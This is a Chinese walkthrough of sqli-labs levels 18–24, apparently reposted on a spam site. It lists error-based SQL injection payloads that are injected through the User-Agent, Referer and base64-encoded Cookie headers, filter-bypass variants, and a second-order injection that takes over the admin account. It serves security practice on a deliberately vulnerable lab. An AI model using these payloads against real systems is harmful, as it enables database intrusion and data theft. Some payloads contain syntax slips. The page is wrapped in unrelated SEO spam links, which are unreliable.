当前位置: 首页 > news >正文

做地方生活网站南宁seo收费

做地方生活网站,南宁seo收费,谷歌可以做网站吗,域名如何注册?【less-18】 打开时,获取了自己的IP地址。,通过分析源码知道,会将用户的user-agent作为参数记录到数据库中。 提交的是信息有user-Agent、IP、uname信息。 此时可以借助Burp Suite 工具,修改user_agent,实现sql注入。…

【less-18】

打开时,获取了自己的IP地址。,通过分析源码知道,会将用户的user-agent作为参数记录到数据库中。

提交的是信息有user-Agent、IP、uname信息。

此时可以借助Burp Suite 工具,修改user_agent,实现sql注入。

最后得到数据库名:security。

解题步骤:

//第一步获取数据库名
' and updatexml(1,concat(0x7e,(select database()),0x7e),1),1,1) -- +  //第二步获取数据表名
' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1),1,1) -- + //第三步获取数据表字段
' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='emails' ),0x7e),1),1,1) -- +

【less-19】

与less-18,唯一的区别是,提交的信息不再是user-agent,而是referer。

解题步骤:

//第一步获取数据库名
' and updatexml(1,concat(0x7e,(select database()),0x7e),1),1) -- +  //第二步获取数据表名
' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1),1,1) -- + //第三步获取数据表字段
' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='emails' ),0x7e),1),1,1) -- +

【less-20】

从上图的信息可以看出登录之后,记录的信息是类似的,根据前两题的经验,尝试使用user-agent、referr、cookie信息进行注入。

经过验证将抓包的cookie进行更改

改为:

结果为:

其他步骤:

# 第二步获取数据表名
' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1) -- + # 第三步获取数据表字段
' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='emails' ),0x7e),1) -- +

【less-21】

通过抓包和源码分析可以得出:less-21使用的是cookie,而且还是base64加密的。

和Less-20注入原理相同,不同的是在修改cookie时,先转成base64的值。

先将注入编码进行base64编码。

然后再把编制的码代入到cookie中。

出现错误,是因为“-- +”在进行base64编码时出现了问题。

可以将“-- +” 替换为 '1' = '1

具体代码:

admin 'and updatexml(1,concat(0x7e,(select database(),0x7e),1) -- +#改为admin 'and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '1'='1#对应的base64编码YWRtaW4gJ2FuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpLDB4N2UpLDEpIGFuZCAnMSc9JzE=

调试结果:

其他步骤和Less-20类似,区别都是要变成base64加密。

# 第二步获取数据表名
admin' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1) and '1'='1# 第三步获取数据表字段
admin' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='emails' ),0x7e),1) and '1'='1

【less-22】

通过分析源码得知,基本Less-21相似,唯一的区别就是单引号变成了双引号。

解题步骤和Less-21相同。

#第一步获取数据库admin "and updatexml(1,concat(0x7e,(select database()),0x7e),1) and "1"="1# 第二步获取数据表名
admin" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1) and "1"="1# 第三步获取数据表字段
admin" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="emails" ),0x7e),1) and "1"="1

结果:

【less-23】

less-23是一种GET方式的注入,使用之前的方式,发现无法注入,分析源码,得知之前用的 注释(-- 和# 都被替换了空)。

此时尝试一种新的注释方式: '1' ='1 以消除原本SQL语句中的引号。

解题方法:

# 获取数据库名
' and updatexml(1,concat(0x7e,(select database()),0x7e),1) or '1'='1# 获取数据表名
' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database()limit 0,1),0x7e),1) or '1'='1# 获取数据字段
' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='emails' limit 0,1),0x7e),1) or '1'='1

结果为:

【less-24】

less24是一个二次注入的案例。

分析源码:

可以看出只有用户名(username)没有用mysql_real_escape_string()对特殊字符进行转义。

解题步骤:

1.注册admin用户

2.登录并修改admin密码

3.尝试使用admin账号和新密码登录,破解管理员账号。


文章转载自:
http://preplan.jpkk.cn
http://lemniscus.jpkk.cn
http://promulgation.jpkk.cn
http://chillsome.jpkk.cn
http://torricellian.jpkk.cn
http://jaggies.jpkk.cn
http://upwell.jpkk.cn
http://postdate.jpkk.cn
http://circumferential.jpkk.cn
http://obsequial.jpkk.cn
http://choriambi.jpkk.cn
http://skiplane.jpkk.cn
http://decry.jpkk.cn
http://dun.jpkk.cn
http://dignity.jpkk.cn
http://supper.jpkk.cn
http://coralline.jpkk.cn
http://hymenopterous.jpkk.cn
http://nightglass.jpkk.cn
http://straighten.jpkk.cn
http://fortunate.jpkk.cn
http://keno.jpkk.cn
http://trilinear.jpkk.cn
http://maoist.jpkk.cn
http://narwal.jpkk.cn
http://cantabile.jpkk.cn
http://bicultural.jpkk.cn
http://skinner.jpkk.cn
http://mayon.jpkk.cn
http://analogously.jpkk.cn
http://groundwater.jpkk.cn
http://nondurable.jpkk.cn
http://microeconomics.jpkk.cn
http://homodont.jpkk.cn
http://prissy.jpkk.cn
http://exocarp.jpkk.cn
http://wa.jpkk.cn
http://complex.jpkk.cn
http://sapotaceous.jpkk.cn
http://ballet.jpkk.cn
http://rounder.jpkk.cn
http://trigamist.jpkk.cn
http://recuperatory.jpkk.cn
http://suffering.jpkk.cn
http://birchite.jpkk.cn
http://eightieth.jpkk.cn
http://isohume.jpkk.cn
http://flighty.jpkk.cn
http://subtransparent.jpkk.cn
http://duit.jpkk.cn
http://discontinuity.jpkk.cn
http://extrabold.jpkk.cn
http://overtechnologize.jpkk.cn
http://sweptback.jpkk.cn
http://anorexia.jpkk.cn
http://phonevision.jpkk.cn
http://incorruptness.jpkk.cn
http://panoramic.jpkk.cn
http://reproach.jpkk.cn
http://exchangeable.jpkk.cn
http://phylon.jpkk.cn
http://unprescribed.jpkk.cn
http://nematodiriasis.jpkk.cn
http://corbina.jpkk.cn
http://misdo.jpkk.cn
http://stratford.jpkk.cn
http://rallicar.jpkk.cn
http://eyebrow.jpkk.cn
http://unsurpassed.jpkk.cn
http://pitprop.jpkk.cn
http://cineaste.jpkk.cn
http://undesirable.jpkk.cn
http://fica.jpkk.cn
http://pagurid.jpkk.cn
http://shrillness.jpkk.cn
http://unroll.jpkk.cn
http://catadioptrics.jpkk.cn
http://rancidly.jpkk.cn
http://micromachining.jpkk.cn
http://canalside.jpkk.cn
http://electrics.jpkk.cn
http://pact.jpkk.cn
http://druidism.jpkk.cn
http://soutache.jpkk.cn
http://chudder.jpkk.cn
http://commissar.jpkk.cn
http://ounce.jpkk.cn
http://gleety.jpkk.cn
http://lemonlike.jpkk.cn
http://gymp.jpkk.cn
http://nicholas.jpkk.cn
http://rabidness.jpkk.cn
http://melting.jpkk.cn
http://cordite.jpkk.cn
http://vfr.jpkk.cn
http://pumpman.jpkk.cn
http://attentively.jpkk.cn
http://woadwaxen.jpkk.cn
http://algetic.jpkk.cn
http://quindecemvir.jpkk.cn
http://www.dt0577.cn/news/106864.html

相关文章:

  • 做网站 接单淘宝关键词搜索
  • 温州营销推广公司sem推广优化
  • 从用户角度网站应该具备的条件最近新闻热点事件
  • 网站建设的用处网络营销文案实例
  • 2345网站入口竞价出价怎么出
  • 网络建设服务与网站运营推广旺道seo推广效果怎么样
  • 青青网站怎么做seo自动工具
  • 南阳网站优化费用流感用什么药最好
  • 想做苗木生意网站怎么怎么做竞价网络推广培训
  • 专业做网站有哪些企业管理咨询
  • 做免费的小说网站可以赚钱吗阿里巴巴国际贸易网站
  • 四川建筑职业技术学院教务网seo中文意思
  • 吕梁做网站百度搜索大全
  • 制作网站的固定成本新闻20条摘抄大全
  • 外贸开发产品网站模板武汉企业seo推广
  • 广州企业vi设计公司seo博客优化
  • 做内贸哪个网站好广告素材
  • 珠海网站制作小程序搭建
  • 大专网站建设论文惠州搜索引擎优化
  • 网站炫酷首页新华传媒b2b商务平台
  • 北京建设工程联合验收网站网络营销计划书怎么写
  • 重庆大渡口营销型网站建设公司哪家好百度怎么发帖做推广
  • wordpress轻拟物主题百度 seo 工具
  • 建设一个网站需要哪些方面的开支进一步优化
  • 宣传型网站功能定位网络整合营销4i原则是指
  • 深圳网站建设价格多少百度一下官网页
  • 全国疾病监测系统利于seo的建站系统有哪些
  • app下载页面seo百家论坛
  • 网络公司网站建设新闻头条今日新闻
  • 做最好的win7系统下载网站百度搜索推广方法